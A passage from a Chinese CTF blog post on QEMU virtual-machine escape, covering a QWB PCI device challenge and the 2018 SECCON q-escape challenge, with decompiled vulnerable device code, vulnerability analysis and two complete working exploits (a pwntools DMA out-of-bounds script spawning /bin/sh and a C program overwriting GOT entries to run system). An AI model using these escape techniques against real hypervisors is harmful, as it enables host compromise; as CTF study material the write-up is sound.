然后我们需要解决写什么值的问题，MMIO地址可以直接拿文档一种的地址0xfebc0000。而COMMAND值的设置就另有说法了，文档二种给出了COMMAND的比特位定义：

这里选择0x107，即设置SERR，Memory space和IO space、Bus Master。

所以最后初始化阶段需要执行的命令如下：

1、outl 0xcf8 0x80001010

2、outl 0xcfc 0xfebc0000

3、outl 0xcf8 0x80001004

4、outw 0xcfc 0x107

执行上述命令之后观察pci设备可以看到BAR0已经设置上了0xfeb00000，对该地址进行读写能正确触发MMIO handler的断点。

利用思路

越界读泄漏地址

首先通过上溢0xee0处可以读取到一个libc地址。再通过上溢到opaque->pdev可以泄漏一个qemu程序基址。

越界写提权

最开始想直接将QWBState->pdev->config_read指针覆盖为system_plt地址，将QWBState->pdev覆盖为/bin/sh地址。但是这样做会使得在覆盖完后，执行inw指令时报错。

关于如何getshell卡了很久。最终参考这篇博客看到了一种提权的方法。

matshao大佬找到两个gadget:

1 2	gadget1: 0x3d2f05：lea rdi, "/bin/sh"; call execv gadget2: 0x0000000014bd1e: mov rsi, [rbx+0x10]; mov rdx, r12; mov rdi, r14; call qword ptr [rax+0x20];

所以这里将QWBState->pdev->config_read指针覆盖为gadget2地址，将QWBState->pdev+0x20处覆盖为gadget1地址即可。

EXP

from pwn import *
from urllib import quote

context.update(arch='amd64', os='linux', log_level='debug')
context.terminal = (['tmux', 'split', '-h'])
filename = './EzCloud'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(
        './qemu-system-x86_64  -display  none -machine  accel=qtest -m  512M -device  qwb -nodefaults -monitor  telnet:127.0.0.1:5555,server,nowait -qtest  stdio'.split())
    libc = ELF(libcname)

else:
    p = remote()
    libc = ELF(libcname)


def init_pci():
    print("write base")
    p.sendline("outl 3320 {}".format(0x80001010))
    p.sendline("outl 3324 {}".format(0xfebc0000))
    print("write command update")
    p.sendline("outl 3320 {}".format(0x80001004))
    p.sendline("outw 3324 {}".format(0x107))


BASE = 0xfeb00000


def set_size(sz):
    p.sendline("writeq {} {}".format(BASE, sz))
    p.recvuntil("OK")


def get_size():
    p.sendline("readq {}".format(BASE))
    p.recvuntil("OK")


def set_idx(idx):
    p.sendline("writeq {} {}".format(BASE + 8, idx))
    p.recvuntil("OK")


def get_idx():
    p.sendline("readq {}".format(BASE + 8))
    p.recvuntil("OK")


def set_src(addr):
    p.sendline("writeq {} {}".format(BASE + 0x10, addr))
    p.recvuntil("OK")


def set_dst(addr):
    p.sendline("writeq {} {}".format(BASE + 0x18, addr))
    p.recvuntil("OK")


def set_cnt(num):
    p.sendline("writeq {} {}".format(BASE + 0x20, num))
    p.recvuntil("OK")


def set_cmd(num):
    p.sendline("writeq {} {}".format(BASE + 0x28, num))
    p.recvuntil("OK")


def do_dma():
    p.sendline("readq {}".format(BASE + 0x30))
    p.recvuntil("OK ")
    p.recvuntil("OK ")


# device -> as
def dma_write(idx, src, dst, cnt):
    set_idx(idx)
    set_src(src)
    set_dst(dst)
    set_cnt(cnt)
    set_cmd(1)


# as -> device
def dma_read(idx, src, dst, cnt):
    set_idx(idx)
    set_src(src)
    set_dst(dst)
    set_cnt(cnt)
    set_cmd(0)


def write_1(addr, value):
    p.sendline("writeq {} {}".format(addr, value))
    p.recvuntil("OK")


def read_1(addr):
    p.sendline("readq {}".format(addr))
    p.recvuntil("OK ")
    content = p.recvuntil("\n")
    p.recvuntil("OK ")
    return int(content, 16)


def set_clock(ns):
    p.sendline("clock_step {}".format(ns))
    p.recvuntil("OK")


def writeb64(addr, value):
    encoded = b64e(value)
    p.sendline("b64write {} {} {}".format(addr, len(value), encoded))
    p.recvuntil("OK")


def readb64(addr, sz):
    p.sendline("b64read {} {}".format(addr, sz))
    p.recvuntil("OK ")
    content = p.recvuntil("\n")
    p.recvuntil("OK ")
    return b64d(content)


user_buf = 0x40000
def pwn():
    init_pci()

    print("[+] oob read to leak libc_addr")
    set_size(32)
    dma_write(0, (1<<64)-0xf00, user_buf, 0x1000)
    do_dma()
    data = readb64(user_buf+0x20, 0x10)
    print(data)
    libc_addr = u64(data[8:].ljust(8, b'\x00'))
    print("[+] libc_addr:", hex(libc_addr))
    libc_base = libc_addr-0x1e1072-0xa000
    print("[+] libc_base:",hex(libc_base))

    print("[+] oob read to leak plt_addr")
    dma_write(0, (1<<64)-0xe00, user_buf+0x1000, 0x1000)
    do_dma()

    data = readb64(user_buf+0x1000, 0x10)
    print(data)
    dev_addr = u64(data[8:].ljust(8, b'\x00'))
    print("[+] dev_addr:", hex(dev_addr))
    plt_base = dev_addr - 0x2d4ec0
    system_plt = plt_base + 0x2d6be0
    binsh = plt_base + 0xa70098
    print("[+] system_plt:", hex(system_plt))
    print("[+] binsh:", hex(binsh))

    heap_addr = read_1(user_buf + 0x1000 + 0xc0)
    print("[+] heap_addr:", hex(heap_addr))

    # 0x0000000014bd1e: mov rsi, [rbx+0x10]; mov rdx, r12; mov rdi, r14; call qword ptr [rax+0x20];
    gadget1 = libc_base + 0x14bd1e
    gadget2 = plt_base + 0x3d2f05  # mov rdi, "/bin/sh"; call execv
    print("[+] gadget1:", hex(gadget1))
    print("[+] gadget2:", hex(gadget2))

    print("[+] oob to write config_read")

    writeb64(user_buf+0x1000+0x460, p64(gadget1))
    writeb64(user_buf+0x1000+0x20, p64(gadget2))

    dma_read(0, user_buf+0x1000,(1<<64)-0xe00, 0x1000)
    do_dma()

    print("[!] trigger vul:")
    p.sendline("inw 3324")
    p.interactive()

pwn()

2018 seccon q-escape

对这种pci设备的利用不了解，主要参考这篇文章

漏洞分析

void __fastcall cydf_vga_class_init(ObjectClass_0 *klass, void *data)
{
  PCIDeviceClass *v2; // rbx
  PCIDeviceClass *v3; // rax

  v2 = (PCIDeviceClass *)object_class_dynamic_cast_assert(
                           klass,
                           "device",
                           "/home/dr0gba/pwn/seccon/qemu-3.0.0/hw/display/cydf_vga.c",
                           3223,
                           "cydf_vga_class_init");
  v3 = (PCIDeviceClass *)object_class_dynamic_cast_assert(
                           klass,
                           "pci-device",
                           "/home/dr0gba/pwn/seccon/qemu-3.0.0/hw/display/cydf_vga.c",
                           3224,
                           "cydf_vga_class_init");
  v3->realize = (void (*)(PCIDevice_0 *, Error_0 **))pci_cydf_vga_realize;
  v3->romfile = "vgabios-cydf.bin";
  v3->vendor_id = 0x1013;
  v3->device_id = 0xB8;
  v3->class_id = 0x300;
  v2->parent_class.desc = "Cydf CLGD 54xx VGA";
  v2->parent_class.categories[0] |= 0x20uLL;
  v2->parent_class.vmsd = &vmstate_pci_cydf_vga;
  v2->parent_class.props = pci_vga_cydf_properties;
  v2->parent_class.hotpluggable = 0;
}

可以看到注册了名为cydf_vga的pci设备，vendor_id=0x1013和device_id=0x300，可以看到其parent_class描述为Cydf CLGD 54xx VGA，可以在源码中搜索发现在cirrus_vga.c出现类似的字符串，应该就是通过魔改Cirrus CLGD 54xx VGA Emulator设备形成的Cydf设备。

/sys/devices/pci0000:00/0000:00:04.0 # cat resource         
0x00000000fa000000 0x00000000fbffffff 0x0000000000042208    
0x00000000febc1000 0x00000000febc1fff 0x0000000000040200    
0x0000000000000000 0x0000000000000000 0x0000000000000000    
0x0000000000000000 0x0000000000000000 0x0000000000000000    
0x0000000000000000 0x0000000000000000 0x0000000000000000    
0x0000000000000000 0x0000000000000000 0x0000000000000000    
0x00000000febb0000 0x00000000febbffff 0x0000000000046200    
0x0000000000000000 0x0000000000000000 0x0000000000000000    
0x0000000000000000 0x0000000000000000 0x0000000000000000    
0x0000000000000000 0x0000000000000000 0x0000000000000000    
0x0000000000000000 0x0000000000000000 0x0000000000000000    
0x0000000000000000 0x0000000000000000 0x0000000000000000    
0x0000000000000000 0x0000000000000000 0x0000000000000000

可以看到存在3个mmio空间，

pci_cydf_vga_realize函数中，只关注cydf_init_common函数

//cydf_init_common
memory_region_init_io(&s->cydf_vga_io, owner, &cydf_vga_io_ops, s, "cydf-io", 0x30uLL);
memory_region_init_io(&s->low_mem, owner, &cydf_vga_mem_ops, s, "cydf-low-memory", 0x20000uLL);
memory_region_init_io(&s->cydf_mmio_io, owner, &cydf_mmio_io_ops, s, "cydf-mmio", 0x1000uLL);

只关注跟cydf这个pci设备有关的内存空间函数，可以发现注册了一个0x30的PMIO空间、一个0x20000的MMIO空间以及一个0x1000的MMIO空间。但是在resource文件中没有看到PMIO的端口范围，于是查看/proc/ioports

/ # cat /proc/ioports
...
03c0-03df : vga+
...

发现vga+的端口范围正好为0x30的大小
根据vgamem中所描述，VGA显存在地址空间中的映射范围为0xa0000-0xbffff。因此查看/proc/iomem找到vga的地址空间

/ # cat /proc/iomem
...
000a0000-000bffff : PCI Bus 0000:00
...

这里可以通过源码对比，原来cirrus_vga_mmio_write函数只有2种情况：addr < 0x10000、0x18000 <= addr < 0x18100，而cydf_vga_mem_write多出一种情况：addr>=0x18100，需要重点分析这部分分支的逻辑。

void __fastcall cydf_vga_mem_write(CydfVGAState *opaque, hwaddr addr, uint64_t mem_value, uint32_t size)
{
  ...

  if ( !(opaque->vga.sr[7] & 1) )
  {
    vga_mem_writeb(&opaque->vga, addr, mem_value);
    return;
  }
  if ( addr <= 0xFFFF )
  {
    ...
  }
  if ( addr - 0x18000 <= 0xFF )
  {
    ...
  }
  else
  {
    v6 = 205 * opaque->vga.sr[0xCC];
    LOWORD(v6) = opaque->vga.sr[0xCC] / 5u;
    cmd = opaque->vga.sr[0xCC] - 5 * v6;
    if ( *(_WORD *)&opaque->vga.sr[0xCD] )      // cmd = sr[0xcc]%5
      LODWORD(mem_value) = (opaque->vga.sr[0xCD] << 16) | (opaque->vga.sr[0xCE] << 8) | mem_value;                                      // idx=sr[0xcd]
    if ( (_BYTE)cmd == 2 )                      // cmd 2 printf buff
    {
      idx = BYTE2(mem_value);
      if ( idx <= 0x10 )
      {
        v25 = (char *)*((_QWORD *)&opaque->vga.vram_ptr + 2 * (idx + 0x133D));
        if ( v25 )
          __printf_chk(1LL, v25);
      }
    }
    else
    {
      if ( (unsigned __int8)cmd <= 2u )
      {
        if ( (_BYTE)cmd == 1 )                  // cmd 1 vs buff[cur_size++]=value, cur_size < max_size
        {
          if ( BYTE2(mem_value) > 0x10uLL )
            return;
          v8 = (__int64)opaque + 16 * BYTE2(mem_value);
          vs_buff = *(_QWORD *)(v8 + 0x133D8);  // 0x133d8 vuln_state buff
          if ( !vs_buff )
            return;
          cur_size = *(unsigned int *)(v8 + 0x133E4);// 0x133e4 cur_size
          if ( (unsigned int)cur_size >= *(_DWORD *)(v8 + 0x133E0) )// 0x133e0 max_size
            return;
LABEL_26:
          *(_DWORD *)(v8 + 0x133E4) = cur_size + 1;
          *(_BYTE *)(vs_buff + cur_size) = mem_value;
          return;
        }
        goto LABEL_35;
      }
      if ( (_BYTE)cmd != 3 )
      {
        if ( (_BYTE)cmd == 4 )                  // cmd 4 vs buff[cur_size++]=value, no cur_size check
        {
          if ( BYTE2(mem_value) > 0x10uLL )
            return;
          v8 = (__int64)opaque + 16 * BYTE2(mem_value);
          vs_buff = *(_QWORD *)(v8 + 0x133D8);
          if ( !vs_buff )
            return;
          cur_size = *(unsigned int *)(v8 + 0x133E4);
          if ( (unsigned int)cur_size > 0xFFF )
            return;
          goto LABEL_26;
        }
LABEL_35:
        v20 = vulncnt;
        if ( vulncnt <= 0x10 && (unsigned __int16)mem_value <= 0x1000uLL )// cmd 0 vs buff[vulcnt]=malloc(value)
        {
          mem_valuea = mem_value;
          ptr = malloc((unsigned __int16)mem_value);
          v22 = (__int64)opaque + 16 * v20;
          *(_QWORD *)(v22 + 0x133D8) = ptr;
          if ( ptr )
          {
            vulncnt = v20 + 1;
            *(_DWORD *)(v22 + 0x133E0) = mem_valuea;
          }
        }
        return;
      }
      if ( BYTE2(mem_value) <= 0x10uLL )        // cmd 3 set max_size
      {
        v23 = (__int64)opaque + 16 * BYTE2(mem_value);
        if ( *(_QWORD *)(v23 + 0x133D8) )
        {
          if ( (unsigned __int16)mem_value <= 0x1000u )
            *(_QWORD *)(v23 + 0x133E0) = (unsigned __int16)mem_value;
        }
      }
    }
  }
}

最主要的区别是增加了0x10000-0x18000地址空间的处理代码，通过代码可以看到增加的功能为vs的处理代码，opaque->vga.sr[0xCC]为cmd，opaque->vga.sr[0xCD]为idx，功能描述如下：

cmd为0时，申请value&0xffff空间大小的堆，并放置vs[vulncnt]中，同时初始化max_size。
cmd为1时，设置idx所对应的vs[idx]的max_size为value&0xffff。
cmd为2时，printf_chk(1,vs[idx].buff)。
cmd为3时，当cur_size<max_size时，vs[idx].buff[cur_sizee++]=value&0xff。
cmd为4时，vs[idx].buff[cur_sizee++]=value&0xff。

漏洞主要有两个地方：

一个是堆溢出。cmd为4时，可以设置max_size，对max_size没有进行检查也没有对堆块进行realloc，后续按这个size进行写，导致溢出。
另一个是数组越界。idx最多可以为0x10，即最多可以寻址vs[0x10]，而vs大小只有16，即vs[0xf]。vs[0x10]则士后面的latch[0]，导致会越界访问到后面的latch数组的第一个元素。

还有要解决的问题就是如何触发漏洞代码。除了addr之外，还需要使得(opaque->vga.sr[7]&1 ==1)以绕过前面的if判断、设置opaque->vga.sr[0xCC]来设置cmd以及设置opaque->vga.sr[0xCD]设置idx。

在代码中可以找到cydf_vga_ioport_write函数中可以设置opaque->vga.sr。addr为0x3C4，vulue为vga.sr的index；当addr为0x3C5时，value为vga.sr[index]的值。从而可以通过cydf_vga_ioport_write设置vga.sr[7]、vga.sr[0xCC]以及vga.sr[0xCD]。

还需要说明的是可以通过cydf_vga_mem_read函数来设置opaque->latch[0]，latch[0]刚好是vs越界访问到的元素。

漏洞利用

往bss段数据中写入要执行的命令cat /root/flag。
将该bss地址写入到全局变量qemu_logfile中。
将vfprintf函数got表覆盖为system函数的plt表地址。
将printf_chk函数got表覆盖为qemu_log函数的地址。
利用cmd为2时，触发printf_chk，最终实现system函数的调用，同时参数也可控。

访问PMIO

UAFIO描述说有三种方式访问PMIO，这里的简便方法是：通过IN以及OUT指令去访问，可以使用IN和OUT去读写相应字节的1、2、4字节数据(outb/inb，outw//inw，outl/inl)，函数的头文件为<sys/io.h>。

还需要注意访问相应的端口需要一定的权限，程序应使用root权限运行，对于0x000-0x3ff之间的端口，使用ioperm(form, num, turn_on)即可，对于0x3ff以上的端口，则该调用执行iopl(3)函数去访问所有的端口。

这题vga+的端口为03c0-03df，因此只需要靶机具有root权限，并调用ioperm(0x3b0, 0x30, 1)打开端口。在调用cydf_vga_ioport_write函数时使用outl和outw指令不能将val参数传进去，而用outb指令就能成功。

访问vga_mem

vga_mem的内存空间并没有在resource文件中体现，根据源码中对cirrus_vga_mem_read函数有个描述，vga的内存空间在0xa0000-0xbffff中，与cat /proc/iomem的结果一致。

/***************************************
 *
 *  memory access between 0xa0000-0xbffff
 *
 ***************************************/

static uint64_t cirrus_vga_mem_read(void *opaque,
                                    hwaddr addr,
                                    uint32_t size)

有一个访问物理内存的简单方法是映射/dev/mem到我们的进程中，然后我们就可以像正常访存一样进行读写。但是提供的环境中并没有挂载/dev/mem文件，可以通过mknod -m 660 /dev/mem c 1 1命令挂载上去。

system( "mknod -m 660 /dev/mem c 1 1" );
int fd = open( "/dev/mem", O_RDWR | O_SYNC );
if ( fd == -1 ) {
    return 0;
}

mmio_mem = mmap( NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0xfebc1000 );
if ( !mmio_mem ) {
    die("mmap mmio failed");
}

vga_mem = mmap( NULL, 0x20000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0xa0000 );
if ( !vga_mem ) {
    die("mmap vga mem failed");
}

EXP

#include <assert.h>
#include <fcntl.h>
#include <inttypes.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>
#include<sys/io.h>

uint32_t mmio_addr = 0xfebc1000;
uint32_t mmio_size = 0x1000;
uint32_t vga_addr = 0xa0000;
uint32_t vga_size = 0x20000;

unsigned char* mmio_mem;
unsigned char* vga_mem;

void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

void set_sr(unsigned int idx, unsigned int val){
    outb(idx,0x3c4);
    outb(val,0x3c5);
}

void vga_mem_write(uint32_t addr, uint8_t value)
{
    *( (uint8_t *) (vga_mem+addr) ) = value;
}

void set_latch( uint32_t value){
    char a;
    a = vga_mem[(value>>16)&0xffff];
    write(1,&a,1);
    a = vga_mem[value&0xffff];
    write(1,&a,1);
}

int main(int argc, char *argv[])
{
    //step 1 mmap /dev/mem to system, (man mem) to see the detail
    system( "mknod -m 660 /dev/mem c 1 1" );
    int fd = open( "/dev/mem", O_RDWR | O_SYNC );
    if ( fd == -1 ) {
        return 0;
    }
    //step2 map the address to fd
    mmio_mem = mmap( NULL, mmio_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, mmio_addr );
    if ( !mmio_mem ) {
        die("mmap mmio failed");
    }

    vga_mem = mmap( NULL, vga_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, vga_addr );
    if ( !vga_mem ) {
        die("mmap vga mem failed");
    }

    if (ioperm(0x3b0, 0x30, 1) == -1) {
        die("cannot ioperm");   
    }

    set_sr(7,1);
    set_sr(0xcc,4);     //v7==4
    set_sr(0xcd,0x10);  //vs[0x10]

    // write cat /flag to bss
    char a;
    unsigned int index = 0;
    uint64_t bss = 0x10C9850;
    char* payload = "cat /flag";
    a=vga_mem[1];write(1,&a,1); //init latch
    set_latch(bss);     //set latch[0]
    for (int i=0; i<9; i++) {
        write(1,&payload[i],1);
        vga_mem_write(0x18100,payload[i]);
    }
    index+=9;

    //qemu_logfile -> bss
    uint32_t qemu_logfile = 0x10CCBE0;
    set_latch(qemu_logfile-index);
    payload = (char*)&bss;
    printf("%s\n",payload);
    for (int i=0; i<8; i++) {
        vga_mem_write(0x18100,payload[i]);
    }
    index+=8;

    //vfprintf.got -> system.plt
    uint32_t vfprintf_got=0xEE7BB0;
    uint64_t system_plt=0x409DD0;
    set_latch(vfprintf_got-index);
    payload = (char*)&system_plt;
    printf("%s\n",payload);
    for (int i=0; i<8; i++) {
        vga_mem_write(0x18100,payload[i]);
    }
    index+=8;

    //printf_chk_got -> qemu_log
    uint64_t qemu_log = 0x9726E8;
    uint32_t printf_chk_got=0xEE7028;
    set_latch(printf_chk_got-index);
    payload = (char*)&qemu_log;
    printf("%s\n",payload);
    for (int i=0; i<8; i++) {
        vga_mem_write(0x18100,payload[i]);
    }

    set_sr(0xcc,2);
    vga_mem_write(0x18100,1);//printf_chk

    return 0;
}

本文作者： A1ex
本文链接： http://yoursite.com/2021/10/13/从qemu逃逸到逃跑/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！